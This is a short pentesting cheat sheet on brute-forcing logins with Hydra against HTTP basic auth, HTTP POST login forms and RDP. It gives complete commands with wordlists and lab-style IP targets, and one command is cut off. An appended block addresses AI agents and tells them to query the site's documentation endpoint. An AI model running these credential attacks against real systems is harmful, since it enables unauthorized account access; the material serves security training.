# Hydra ## Hydra Supported Services ```bash hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e ```

## HTTP AUTH Bruteforce We can use hydra to pass it colon seperated wordlist with default credentials and we can try to do a bruteforce attack on the http login, i will use the wordlist from seclists which containes the **default credentials by colon seperation** ```python hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt http-get://94.237.53.3:40213/ ```

## Hydra POST Form BruteForce Attack If you have a login page and you need to bruteforce the creds for that, one way is you can use the burpsuite Intruder, the Second thing which we can use is Hydra Post Form as well there are 3 things we need to add after http-post-form, -s is for port 1. Login Endpoint 2. Parameters 3. Fail or success msg OR Something from Page Source ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt 94.237.63.83 -s 51867 http-post-form "/login.php:username=^USER^&password=^PASS^:

## Hydra on RDP Port 3389 ```python hydra -L users.txt -P passwords.txt rdp://127.0.0.1 ``` ### Hydra on RDP with Multipe IPs ``` hydra -L users.txt -P passwords.txt -M IPs.txt rdp ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.programmersecurity.com/password-and-bruteforce-attacks/hydra.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.